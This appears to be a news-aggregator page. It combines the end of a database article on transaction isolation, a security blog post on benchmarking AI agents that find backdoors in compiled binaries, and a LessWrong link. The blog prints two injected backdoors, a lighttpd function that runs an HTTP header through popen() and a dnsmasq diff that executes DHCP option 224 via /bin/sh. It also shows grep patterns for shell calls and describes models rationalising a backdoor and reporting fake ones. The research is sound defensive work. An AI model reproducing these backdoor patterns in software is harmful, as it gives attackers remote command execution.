xmin stores the ID of the trans­ac­tion that cre­ated a row ver­sion, and xmax is the ID of the trans­ac­tion that caused a re­place­ment row to be cre­ated. Postgres uses these to de­ter­mine which row ver­sion each trans­ac­tion sees.
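A deliberately simplified model of that visibility rule in Python (real Postgres also checks commit status, in-progress transaction lists, and more, so treat this as a mental model only):

```python
# A row version is visible to a snapshot if it was created by a transaction
# the snapshot can see (xmin <= snapshot_xid) and has not been replaced by
# one it can see (xmax is None or xmax > snapshot_xid).
def visible(row, snapshot_xid):
    created = row["xmin"] <= snapshot_xid
    replaced = row["xmax"] is not None and row["xmax"] <= snapshot_xid
    return created and not replaced

versions = [
    {"id": 4, "name": "liz", "xmin": 3, "xmax": 10},     # old version, replaced by xid 10
    {"id": 4, "name": "aly", "xmin": 10, "xmax": None},  # new version, created by xid 10
]

# A snapshot taken before transaction 10 sees "liz"; a later one sees "aly".
print([r["name"] for r in versions if visible(r, 9)])   # ['liz']
print([r["name"] for r in versions if visible(r, 11)])  # ['aly']
```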

Let’s look at Session A again, but this time with an additional Session B running simultaneously. Press “play sessions” again.

Before the commit, Session B could not see Session A’s modification: it sees the name as “liz” while Session A sees “aly” within its transaction. At this stage it has nothing to do with xmin and xmax; other transactions simply cannot see uncommitted data. After Session A commits, Session B can see the new name “aly”, because the data is committed and its transaction ID is greater than 10.

If the trans­ac­tion in­stead gets a roll­back, those row changes do not get ap­plied, leav­ing the data­base in a state as if the trans­ac­tion never be­gan in the first place.

This is a simple scenario: only one of the transactions modifies data, and Session B only runs select statements! When both modify data simultaneously, each one will be able to “see” the modifications it made, but those changes won’t bleed out into other transactions until commit. Here’s an example where each transaction selects data, updates data, selects again, commits, and finally both run a final select.

The con­cur­rent trans­ac­tions can­not see each oth­er’s changes un­til the data is com­mit­ted. The same mech­a­nisms are used to con­trol data vis­i­bil­ity when there are hun­dreds of si­mul­ta­ne­ous trans­ac­tions on busy Postgres data­bases.

Before we move on to MySQL, one more im­por­tant note. What hap­pens to all those du­pli­cated rows? Over time, we can end up with thou­sands of du­pli­cate rows that are no longer needed. There are sev­eral things Postgres does to mit­i­gate this is­sue, but I’ll fo­cus on the VACUUM FULL com­mand. When run, this purges ver­sions of rows that are so old that we know no trans­ac­tions will need them go­ing for­ward. It com­pacts the table in the process. Try it out be­low.

Notice that when the vac­uum full com­mand ex­e­cutes, all un­used rows are elim­i­nated, and the gaps in the table are com­pressed, re­claim­ing the un­used space.

MySQL achieves the con­sis­tent read be­hav­ior us­ing a dif­fer­ent ap­proach. Instead of keep­ing many copies of each row, MySQL im­me­di­ately over­writes old row data with new row data when mod­i­fied. This means it re­quires less main­te­nance over time for the rows (in other words, we don’t need to do vac­u­um­ing like Postgres).

However, MySQL still needs the abil­ity to show dif­fer­ent ver­sions of a row to dif­fer­ent trans­ac­tions. For this, MySQL uses an undo log — a log of re­cently-made row mod­i­fi­ca­tions, al­low­ing a trans­ac­tion to re­con­struct past ver­sions on-the-fly.

Notice how each MySQL row has two meta­data columns (in blue). These keep track of the ID of the trans­ac­tion that up­dated the row most re­cently (xid), and a ref­er­ence to the most re­cent mod­i­fi­ca­tion in the undo log (ptr).

When there are si­mul­ta­ne­ous trans­ac­tions, trans­ac­tion A may clob­ber the ver­sion of a row that trans­ac­tion B needs to see. Transaction B can see the pre­vi­ous ver­sion(s) of the row by check­ing the undo log, which stores old val­ues so long as any run­ning trans­ac­tion may need to see it.

There can even be sev­eral undo log records in the log for the same row si­mul­ta­ne­ously. In such a case, MySQL will choose the cor­rect ver­sion based on trans­ac­tion iden­ti­fiers.
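Here's the same kind of toy model for MySQL's approach; the xid and ptr fields mirror the metadata described above, not InnoDB's actual on-disk format:

```python
# The table stores only the newest version; the xid and ptr metadata let a
# reader walk the undo log backwards to rebuild the version it should see.
row = {"id": 4, "name": "aly", "xid": 10, "ptr": 0}  # newest version only
undo_log = [{"name": "liz", "xid": 3, "ptr": None}]  # the row before xid 10 changed it

def read_as_of(row, undo_log, snapshot_xid):
    name, xid, ptr = row["name"], row["xid"], row["ptr"]
    while xid > snapshot_xid and ptr is not None:
        rec = undo_log[ptr]  # reconstruct the previous version on the fly
        name, xid, ptr = rec["name"], rec["xid"], rec["ptr"]
    return name

print(read_as_of(row, undo_log, 9))   # 'liz'
print(read_as_of(row, undo_log, 11))  # 'aly'
```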

The idea of repeatable reads is important for databases, but it is just one of several isolation levels that databases like MySQL and Postgres support. This setting determines how “protected” each transaction is from seeing data that other simultaneous transactions are modifying. Adjusting it gives the user control over the tradeoff between isolation and performance.

Both MySQL and Postgres have four levels of isolation. From strongest to weakest, these are: Serializable, Repeatable Read, Read Committed, and Read Uncommitted.

Stronger lev­els of iso­la­tion pro­vide more pro­tec­tions from data in­con­sis­tency is­sues across trans­ac­tions, but come at the cost of worse per­for­mance in some sce­nar­ios.

Serializable is the strongest. In this mode, all trans­ac­tions be­have as if they were run in a well-de­fined se­quen­tial or­der, even if in re­al­ity many ran si­mul­ta­ne­ously. This is ac­com­plished via com­plex lock­ing and wait­ing.

The other three grad­u­ally loosen the strict­ness, and can be de­scribed by the un­de­sir­able phe­nom­ena they al­low or pro­hibit.

A phan­tom read is one where a trans­ac­tion runs the same SELECT mul­ti­ple times, but sees dif­fer­ent re­sults the sec­ond time around. This is typ­i­cally due to data that was in­serted and com­mit­ted by a dif­fer­ent trans­ac­tion. The time­line be­low vi­su­al­izes such a sce­nario. The hor­i­zon­tal axis rep­re­sents time pass­ing on a data­base with two clients. Hit the ↻ but­ton to re­play the se­quence at any time.

After serializable, the next, slightly weaker isolation level is called repeatable read. Under the SQL standard, the repeatable read level allows phantom reads, though in Postgres they still aren’t possible.

These non-repeatable reads happen when a transaction reads a row, and then later re-reads the same row, finding changes made by another, already-committed transaction. This is dangerous because we may have already made assumptions about the state of our database, but that data has changed under our feet.

The read com­mit­ted iso­la­tion level, the next af­ter re­peat­able read, al­lows these and phan­tom reads to oc­cur. The trade­off is slightly bet­ter data­base trans­ac­tion per­for­mance.

The last and ar­guably worst is dirty reads. A dirty read is one where a trans­ac­tion is able to see data writ­ten by an­other trans­ac­tion run­ning si­mul­ta­ne­ously that is not yet com­mit­ted. This is re­ally bad! In most cases, we never want to see data that is un­com­mit­ted from other trans­ac­tions.

The loos­est iso­la­tion level, read un­com­mit­ted, al­lows for dirty reads and the other two de­scribed above. It is the most dan­ger­ous and also most per­for­mant mode.
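You can actually observe a dirty read with SQLite's shared-cache mode, which supports an opt-in read-uncommitted setting (used here purely as a demonstration vehicle, not as a claim about MySQL or Postgres internals):

```python
import sqlite3

uri = "file:dirtydemo?mode=memory&cache=shared"
a = sqlite3.connect(uri, uri=True)
b = sqlite3.connect(uri, uri=True)
b.execute("PRAGMA read_uncommitted = 1")  # opt in to dirty reads (shared-cache only)

a.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
a.execute("INSERT INTO users VALUES (1, 'ben')")
a.commit()

a.execute("UPDATE users SET name = 'joe' WHERE id = 1")  # not committed yet
dirty = b.execute("SELECT name FROM users WHERE id = 1").fetchone()

a.rollback()
clean = b.execute("SELECT name FROM users WHERE id = 1").fetchone()
print(dirty, clean)  # ('joe',) ('ben',)
```

Session B briefly observed data that was later rolled back and never existed as far as committed history is concerned — exactly why dirty reads are dangerous.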

The keen-eyed ob­server will no­tice that I have ig­nored a par­tic­u­lar sce­nario, quite on pur­pose, up to this mo­ment. What if two trans­ac­tions need to mod­ify the same row at the same time?

Precisely how this is han­dled de­pends on both (A) the data­base sys­tem and (B) the iso­la­tion level. To keep the dis­cus­sion sim­ple, we’ll fo­cus on how this works for the strictest (SERIALIZABLE) level in Postgres and MySQL. Yet again, the world’s two most pop­u­lar re­la­tional data­bases take very dif­fer­ent ap­proaches here.

A lock is a software mechanism for giving ownership of a piece of data to one transaction (or a set of transactions). Transactions obtain a lock on a row when they need to “own” it without interruption. When the transaction is finished using the rows, it releases the lock to allow other transactions access.

Though there are many types of locks in prac­tice, the two main ones you need to know about here are shared locks and ex­clu­sive locks.

A shared (S) lock can be ob­tained by mul­ti­ple trans­ac­tions on the same row si­mul­ta­ne­ously. Typically, trans­ac­tions will ob­tain shared locks on a row when read­ing it, be­cause mul­ti­ple trans­ac­tions can do so si­mul­ta­ne­ously safely.

An ex­clu­sive (X) lock can only be owned by one trans­ac­tion for any given row at any given time. When a trans­ac­tion re­quests an X lock, no other trans­ac­tions can have any type of lock on the row. These are used when a trans­ac­tion needs to write to a row, be­cause we don’t want two trans­ac­tions si­mul­ta­ne­ously mess­ing with col­umn val­ues!

In SERIALIZABLE mode, all trans­ac­tions must al­ways ob­tain X locks when up­dat­ing a row. Most of the time, this works fine other than the per­for­mance over­head of lock­ing. In sce­nar­ios where two trans­ac­tions are both try­ing to up­date the same row si­mul­ta­ne­ously, this can lead to dead­lock!

MySQL can de­tect dead­lock and will kill one of the in­volved trans­ac­tions to al­low the other to make progress.
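The usual way to detect this is a wait-for graph: if transaction A waits for a lock held by B, and B waits for one held by A, there is a cycle. A minimal sketch of that check (a toy, not InnoDB's actual detector):

```python
# Each entry means "this transaction is waiting for that one".
waits_for = {"A": "B", "B": "A"}

def has_deadlock(start, waits_for):
    seen, cur = set(), start
    while cur in waits_for:
        if cur in seen:
            return True  # we walked back to a transaction we already visited
        seen.add(cur)
        cur = waits_for[cur]
    return False  # the chain ends at a transaction that isn't waiting

print(has_deadlock("A", waits_for))  # True: A -> B -> A is a cycle
```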

Postgres han­dles write con­flicts in SERIALIZABLE mode with less lock­ing, and avoids the dead­lock is­sue com­pletely.

As trans­ac­tions read and write rows, Postgres cre­ates pred­i­cate locks, which are locks” on sets of rows spec­i­fied by a pred­i­cate. For ex­am­ple, if a trans­ac­tion up­dates all rows with IDs 10–20, it will take a lock on the pred­i­cate WHERE id BETWEEN 10 AND 20. These locks are not used to block ac­cess to rows, but rather to track which rows are be­ing used by which trans­ac­tions, and then de­tect data con­flicts on-the-fly.

Combined with multi-row ver­sion­ing, this lets Postgres use op­ti­mistic con­flict res­o­lu­tion. It never blocks trans­ac­tions while wait­ing to ac­quire a lock, but it will kill a trans­ac­tion if it de­tects that it’s vi­o­lat­ing the SERIALIZABLE guar­an­tees.
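A toy sketch of optimistic conflict resolution in the same spirit (not Postgres's actual serializable-snapshot algorithm, which tracks read/write dependencies in far more detail): each transaction records what it read, and commit fails if any of it has since changed.

```python
class SerializationError(Exception):
    pass

store = {"row4": ("liz", 1)}  # value, version

def commit(read_set, writes, store):
    # Abort if any row this transaction read has changed since it was read.
    for key, seen_version in read_set.items():
        if store[key][1] != seen_version:
            raise SerializationError(key + " changed since it was read")
    for key, value in writes.items():
        store[key] = (value, store[key][1] + 1)

t1_reads = {"row4": 1}
t2_reads = {"row4": 1}                    # both transactions read row4 at version 1
commit(t1_reads, {"row4": "aly"}, store)  # T1 commits first and wins

t2_failed = False
try:
    commit(t2_reads, {"row4": "joe"}, store)
except SerializationError:
    t2_failed = True                      # T2 is killed; the application should retry

print(store["row4"], t2_failed)  # ('aly', 2) True
```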

Let’s look at a sim­i­lar time­line from the MySQL ex­am­ple, but this time watch­ing Postgres’ op­ti­mistic tech­nique.

The dif­fer­ence is sub­tle vi­su­ally, but im­ple­mented in quite dif­fer­ent ways. Both Postgres and MySQL lever­age the killing of one trans­ac­tion in fa­vor of main­tain­ing SERIALIZABLE guar­an­tees. Applications must ac­count for this out­come, and have retry logic for im­por­tant trans­ac­tions.

Transactions are just one tiny cor­ner of all the amaz­ing en­gi­neer­ing that goes into data­bases, and we only scratched the sur­face! But a fun­da­men­tal un­der­stand­ing of what they are, how they work, and the guar­an­tees of the four iso­la­tion lev­els is help­ful for work­ing with data­bases more ef­fec­tively.

What es­o­teric cor­ner of data­base man­age­ment sys­tems would you like to see us cover next? Join our Discord com­mu­nity and let us know.

...

Read the original on planetscale.com »

9 222 shares, 11 trendiness

We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them


Claude can code, but can it check bi­nary ex­e­cuta­bles?

Now on the front page of Hacker News — see the dis­cus­sion.

We already did our experiments with using NSA software to hack a classic Atari game. This time we want to focus on a much more practical task — using AI agents for malware detection. We partnered with Michał “Redford” Kowalczyk, a reverse engineering expert from Dragon Sector known for finding malicious code in Polish trains, to create a benchmark of finding backdoors in binary executables, without access to source code.

We were sur­prised that to­day’s AI agents can de­tect some hid­den back­doors in bi­na­ries. We had­n’t ex­pected them to pos­sess such spe­cial­ized re­verse en­gi­neer­ing ca­pa­bil­i­ties.

However, this ap­proach is not ready for pro­duc­tion. Even the best model, Claude Opus 4.6, found rel­a­tively ob­vi­ous back­doors in small/​mid-size bi­na­ries only 49% of the time. Worse yet, most mod­els had a high false pos­i­tive rate — flag­ging clean bi­na­ries.

In this blog post we dis­cuss a few re­cent se­cu­rity sto­ries, ex­plain what bi­nary analy­sis is, and how we con­struct a bench­mark for AI agents. We will see when they ac­com­plish tasks and when they fail — by miss­ing ma­li­cious code or by re­port­ing false find­ings.

Just a few months ago Shai Hulud 2.0 com­pro­mised thou­sands of or­ga­ni­za­tions, in­clud­ing Fortune 500 com­pa­nies, banks, gov­ern­ments, and cool star­tups — see post­mortem by PostHog. It was a sup­ply chain at­tack for the Node Package Manager ecosys­tem, in­ject­ing ma­li­cious code steal­ing cre­den­tials.

Just a few days ago, Notepad++ shared up­dates on a hi­jack by state-spon­sored ac­tors, who re­placed le­git­i­mate bi­na­ries with in­fected ones.

Even the phys­i­cal world is at stake, in­clud­ing crit­i­cal in­fra­struc­ture. For ex­am­ple, re­searchers found hid­den ra­dios in Chinese so­lar power in­vert­ers and se­cu­rity loop­holes in elec­tric buses. Every dig­i­tal de­vice has a firmware, which is much harder to check than soft­ware we in­stall on the com­puter — and has much more di­rect im­pact. Both state and cor­po­rate ac­tors have in­cen­tive to tam­per with these.

You do not even need bad ac­tors. Network routers of­ten have hid­den ad­min pass­words baked into their firmware so the ven­dor can trou­bleshoot re­motely — but any­one who dis­cov­ers those pass­words gets the same ac­cess.

Can we use AI agents to pro­tect against such at­tacks?

In day-to-day pro­gram­ming, we work with source code. It re­lies on high-level ab­strac­tions: classes, func­tions, types, or­ga­nized into a clear file struc­ture. LLMs ex­cel here be­cause they are trained on this hu­man-read­able logic.

Compilation trans­lates high-level lan­guages (like Go or Rust) into low-level ma­chine code for a given CPU ar­chi­tec­ture (such as x86 or ARM). We get raw CPU in­struc­tions: mov­ing data be­tween reg­is­ters, adding num­bers, or jump­ing to mem­ory ad­dresses. The orig­i­nal code struc­ture, to­gether with vari­ables and func­tions names gets lost.

To make mat­ters worse, com­pil­ers ag­gres­sively op­ti­mize for speed, not read­abil­ity. They in­line func­tions (changing the call hi­er­ar­chy), un­roll loops (replacing con­cise logic with repet­i­tive blocks), and re­order in­struc­tions to keep the proces­sor busy.

Yet, a bi­nary is what users ac­tu­ally run. And for closed-source and bi­nary-dis­trib­uted soft­ware, it is all we have.

Analyzing bi­na­ries is a long and te­dious process of re­verse en­gi­neer­ing, which starts with a chain of trans­la­tions: ma­chine code → as­sem­bly → pseudo-C. Let’s see how an ex­am­ple back­door looks in those rep­re­sen­ta­tions:

Going from raw bytes to assembly is straightforward; the disassembly can be produced with a command-line tool like objdump.

Turning as­sem­bly into C is much harder — we need re­verse en­gi­neer­ing tools, such as open-source Ghidra (created by NSA) and Radare2, or com­mer­cial ones like IDA Pro and Binary Ninja.

The de­com­pil­ers try their best at mak­ing sense of the CPU in­struc­tions and gen­er­at­ing a read­able C code. But since all those high-level ab­strac­tions and vari­able names got lost dur­ing com­pi­la­tion, the out­put is far from per­fect. You see out­put full of FUN_00130550, bVar49, lo­cal_148 — names that mean noth­ing.

We ask AI agents to an­a­lyze bi­na­ries and de­ter­mine if they con­tain back­doors or ma­li­cious mod­i­fi­ca­tions.

We started with sev­eral open-source pro­jects: lighttpd (a C web server), dns­masq (a C DNS/DHCP server), Dropbear (a C SSH server), and Sozu (a Rust load bal­ancer). Then, we man­u­ally in­jected back­doors. For ex­am­ple, we hid a mech­a­nism for an at­tacker to ex­e­cute com­mands via an un­doc­u­mented HTTP header.

Important caveat: All back­doors in this bench­mark are ar­ti­fi­cially in­jected for test­ing. We do not claim these pro­jects have real vul­ner­a­bil­i­ties; they are le­git­i­mate open-source soft­ware that we mod­i­fied in con­trolled ways.

These back­doors weren’t par­tic­u­larly so­phis­ti­cated — we did­n’t try to heav­ily ob­fus­cate them or hide them in ob­scure parts of the code. They are the kind of anom­aly a skilled hu­man re­verse en­gi­neer could spot rel­a­tively eas­ily.

The agents are given a com­piled ex­e­cutable — with­out source code or de­bug sym­bols. They have ac­cess to re­verse en­gi­neer­ing tools: Ghidra, Radare2, and binu­tils. The task is to iden­tify ma­li­cious code and pin­point the start ad­dress of the func­tion con­tain­ing the back­door (e.g., 0x4a1c30). See dns­masq-back­door-de­tect-printf/​in­struc­tion.md for a typ­i­cal in­struc­tion.

A few tasks use a dif­fer­ent method­ol­ogy: we pre­sent three bi­na­ries and ask which ones con­tain back­doors, with­out ask­ing for the spe­cific lo­ca­tion — see e.g. sozu-back­door-mul­ti­ple-bi­na­ries-de­tect/​in­struc­tion.md. We ex­pected this to be a sim­pler task (it was­n’t). This ap­proach sim­u­lates sup­ply chain at­tacks, where of­ten only a sub­set of bi­na­ries are al­tered.

We in­jected a back­door into the lighttpd server that ex­e­cutes shell com­mands from an un­doc­u­mented HTTP header.

Here’s the core of the in­jected back­door — it looks for a hid­den X-Forwarded-Debug header, ex­e­cutes its con­tents as a shell com­mand via popen(), and re­turns the out­put in a re­sponse header:

gboolean li_check_debug_header(liConnection *con) {
    liRequest *req = &con->mainvr->request;
    GList *l;

    l = li_http_header_find_first(req->headers, CONST_STR_LEN("X-Forwarded-Debug"));
    if (NULL != l) {
        liHttpHeader *hh = (liHttpHeader*) l->data;
        char *debugIn = LI_HEADER_VALUE(hh);
        FILE *fp = popen(debugIn, "r"); // Execute attacker's command
        // ... read output into debugOut ...
        pclose(fp);
        li_http_header_insert(con->mainvr->response.headers,
            CONST_STR_LEN("X-Request-Trace"), debugOut, strlen(debugOut));
        return TRUE;
    }
    return FALSE;
}

For a user who down­loaded this back­doored server, it would seem like this is a le­git­i­mate pro­gram. However, an at­tacker could triv­ially ex­e­cute any com­mand by send­ing a spe­cially crafted packet.

Here’s how Claude did it:

Step 1. The model iden­ti­fied the bi­nary and its 26 shared li­braries — one of which con­tained the back­door.

Step 2. Next, it ran strings with grep pat­terns look­ing for ob­vi­ous in­di­ca­tors of a back­door:

strings bin/lighttpd2-worker | grep -iE '(shell|bash|/bin/sh|exec|system|backdoor)'

However, the com­mand did­n’t find any­thing sus­pi­cious. The model ex­panded the search to all shared li­braries, look­ing for more pat­terns (hardcoded IPs, sus­pi­cious com­mands, and cre­den­tial pat­terns). Still noth­ing ob­vi­ous.
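That kind of scan is easy to picture; here is a tiny Python re-implementation of the strings-plus-grep idea (a sketch for illustration, not the agent's actual tooling — the blob and patterns are made up):

```python
import re

# Pull printable ASCII runs out of a binary blob (what `strings` does) and
# flag those matching suspicious patterns (what the grep above does).
def strings(data, min_len=4):
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)

suspicious = re.compile(rb"/bin/sh|bash|exec|system|backdoor")
blob = b"\x00\x01GET /index\x00/bin/sh\x00\xff\x90popen\x00"
hits = [s for s in strings(blob) if suspicious.search(s)]
print(hits)  # [b'/bin/sh']
```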

Step 3. Claude switched strate­gies and used nm -D to list im­ported func­tions:

for f in lib/*.so; do
  nm -D "$f" | grep -E ' U (system|exec|popen)'
done

lib/liblighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5

Claude detected that one of the libraries the server uses imports popen(), a function used to execute shell commands. This immediately alarmed the model:

Step 4. Claude in­ves­ti­gated fur­ther to de­ter­mine if the func­tion was truly ma­li­cious, us­ing the Radare2 de­com­piler for analy­sis.

It first iden­ti­fied which func­tion calls popen():

r2 -q -c 'aaa; axt @ sym.imp.popen' lib/liblighttpd2-shared-2.0.0.so

The out­put of this com­mand re­vealed that a func­tion called li_check­_de­bug_­header does shell ex­e­cu­tion. (That’s the back­door we added!). The model smelled some­thing fishy:

Then us­ing Radare2’s de­com­piler, the model ex­am­ined the func­tion:

r2 -q -c 'aaa; s dbg.li_check_debug_header; pdc' lib/liblighttpd2-shared-2.0.0.so

The de­com­piled pseudocode al­lowed the LLM to un­der­stand how the back­door works — it looks for an un­doc­u­mented HTTP header X-Forwarded-Debug and if it’s pre­sent ex­e­cutes an at­tacker-pro­vided com­mand. The server con­ve­niently sends the com­mand out­put back in a X-Request-Trace re­sponse header.

Step 5. Finally, Claude used Radare2 to con­firm the func­tion was­n’t dead code, check­ing cross-ref­er­ences to en­sure it was called from the main pro­gram:

r2 -q -c 'aaa; s 0x00015260; pd 10' lib/liblighttpd2-shared-2.0.0.so

Now be­ing con­fi­dent that it found a real back­door, Claude re­ported those find­ings back and fin­ished the ex­plo­ration.

However, LLMs very of­ten miss even ob­vi­ous back­doors.

We took dnsmasq — a widely-used DNS/DHCP server — and added an embarrassingly obvious backdoor. We weren’t even trying to hide it: if DHCP option 224 (undocumented, we made it up) is present in a packet, execute its contents as a shell command via execl("/bin/sh", "sh", "-c", buf, NULL).

The back­door we added was just 7 lines of C in DHCP packet pars­ing:

  /* existing DHCP option handling */
  match_vendor_opts(opt, daemon->dhcp_opts);
+ if (opt = option_find(mess, sz, 224, 1)) {
+   char buf[256];
+   int len = option_len(opt);
+   memcpy(buf, option_ptr(opt, 0), len);
+   buf[len] = '\0';
+   execl("/bin/sh", "sh", "-c", buf, NULL);
+ }

Even the best model in our benchmark got fooled by this task. Claude Opus 4.6 found /bin/sh in the strings output early on, traced it to the exact function containing the backdoor, and saw the execl("/bin/sh", "sh", "-c", …) call. Then it simply assumed it was normal:

It ex­am­ined the func­tion, but con­cluded:

The model found the exact function, saw the exact execl call with /bin/sh -c — and rationalized it away as “legitimate DHCP script execution.” It never checked where the command string actually comes from (a DHCP packet sent by a client). It then moved on to investigate other functions and never circled back.

The ex­e­cuta­bles in our bench­mark of­ten have hun­dreds or thou­sands of func­tions — while the back­doors are tiny, of­ten just a dozen lines buried deep within. Finding them re­quires strate­gic think­ing: iden­ti­fy­ing crit­i­cal paths like net­work parsers or user in­put han­dlers and ig­nor­ing the noise.

Current LLMs lack this high-level in­tu­ition. Instead of pri­or­i­tiz­ing high-risk ar­eas, they of­ten de­com­pile ran­dom func­tions or grep for ob­vi­ous key­words like sys­tem() or exec(). When sim­ple heuris­tics fail, mod­els fre­quently hal­lu­ci­nate or give up en­tirely.

This lack of fo­cus leads them down rab­bit holes. We ob­served agents fix­at­ing on le­git­i­mate li­braries — treat­ing them as sus­pi­cious anom­alies. They wasted their en­tire con­text win­dow au­dit­ing be­nign code while the ac­tual back­door re­mained un­touched in a com­pletely dif­fer­ent part of the bi­nary.

The se­cu­rity com­mu­nity is drown­ing in AI-generated noise. The curl pro­ject re­cently stopped pay­ing for bug re­ports partly be­cause of AI slop:

The vast ma­jor­ity of AI-generated er­ror re­ports sub­mit­ted to cURL are pure non­sense.

A security tool which gives you fake reports is useless and frustrating to use. We specifically tested for this with negative tasks: clean binaries with no backdoor. We found that 28% of the time, models reported backdoors or issues that weren’t real. For any practical malware detection software, we would expect a false positive rate of less than 0.001%, as most software is safe; see the false positive paradox.

For example, Gemini 3 Pro supposedly “discovered” a backdoor in… command-line argument parsing in one of the servers:

In re­al­ity, the source code cor­rectly val­i­dates and parses the com­mand-line ar­gu­ment as a num­ber. It never at­tempts to ex­e­cute it. Several findings” that the model re­ported are com­pletely fake and miss­ing from the source code.

We re­stricted agents to open-source tools: Ghidra and Radare2. We ver­i­fied that fron­tier mod­els (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% suc­cess rate at op­er­at­ing them — cor­rectly load­ing bi­na­ries and run­ning ba­sic com­mands.

However, these open-source de­com­pil­ers lag be­hind com­mer­cial al­ter­na­tives like IDA Pro. While they han­dle C bi­na­ries well, they have is­sues with Rust (though agents man­aged to solve some tasks), and fail com­pletely with Go ex­e­cuta­bles.

For example, we tried to work with Caddy, a web server written in Go, with a binary weighing 50MB. Radare2 loaded it in 6 minutes but produced poor-quality code, while Ghidra not only took 40 minutes just to load, it also failed to return correct data. Meanwhile, IDA Pro loaded it in 5 minutes, giving correct, usable code sufficient for manual analysis.

To en­sure we mea­sure agent in­tel­li­gence rather than tool qual­ity, we ex­cluded Go bi­na­ries and fo­cused mostly on C ex­e­cuta­bles (and one Rust pro­ject) where the tool­ing is re­li­able.

Can AI find back­doors in bi­na­ries? Sometimes. Claude Opus 4.6 solved 49% of tasks, while Gemini 3 Pro solved 44% and Claude Opus 4.5 solved 37%.

As of now, it is far from be­ing use­ful in prac­tice — we would need a much higher de­tec­tion rate and a much lower false pos­i­tive rate to make it a vi­able end-to-end so­lu­tion.

It works on small bi­na­ries and when it sees un­ex­pected pat­terns. At the same time, it strug­gles with larger files or when back­doors mimic le­git­i­mate ac­cess routes.

While end-to-end mal­ware de­tec­tion is not re­li­able yet, AI can make it eas­ier for de­vel­op­ers to per­form ini­tial se­cu­rity au­dits. A de­vel­oper with­out re­verse en­gi­neer­ing ex­pe­ri­ence can now get a first-pass analy­sis of a sus­pi­cious bi­nary.

A year ago, mod­els could­n’t re­li­ably op­er­ate Ghidra. Now they can per­form gen­uine re­verse en­gi­neer­ing — load­ing bi­na­ries, nav­i­gat­ing de­com­piled code, trac­ing data flow.

The whole field of work­ing with bi­na­ries be­comes ac­ces­si­ble to a much wider range of soft­ware en­gi­neers. It opens op­por­tu­ni­ties not only in se­cu­rity, but also in per­form­ing low-level op­ti­miza­tion, de­bug­ging and re­verse en­gi­neer­ing hard­ware, and port­ing code be­tween ar­chi­tec­tures.

We be­lieve that re­sults can be fur­ther im­proved with con­text en­gi­neer­ing (including proper skills or MCP) and ac­cess to com­mer­cial re­verse en­gi­neer­ing soft­ware (such as the men­tioned IDA Pro and Binary Ninja).

Once AI demon­strates the ca­pa­bil­ity to solve some tasks (as it does now), sub­se­quent mod­els usu­ally im­prove dras­ti­cally.

Moreover, we ex­pect that a lot of analy­sis will be per­formed with lo­cal mod­els, likely fine-tuned for mal­ware de­tec­tion. Security-sensitive or­ga­ni­za­tions can’t up­load pro­pri­etary bi­na­ries to cloud ser­vices. Additionally, bad ac­tors will op­ti­mize their mal­ware to evade pub­lic mod­els, ne­ces­si­tat­ing the use of pri­vate, lo­cal mod­els for ef­fec­tive de­fense.

You can check full re­sults and see the tasks at QuesmaOrg/BinaryAudit.

...

Read the original on quesma.com »

10 216 shares, 27 trendiness

My journey to the microwave alternate timeline — LessWrong


...

Read the original on www.lesswrong.com »
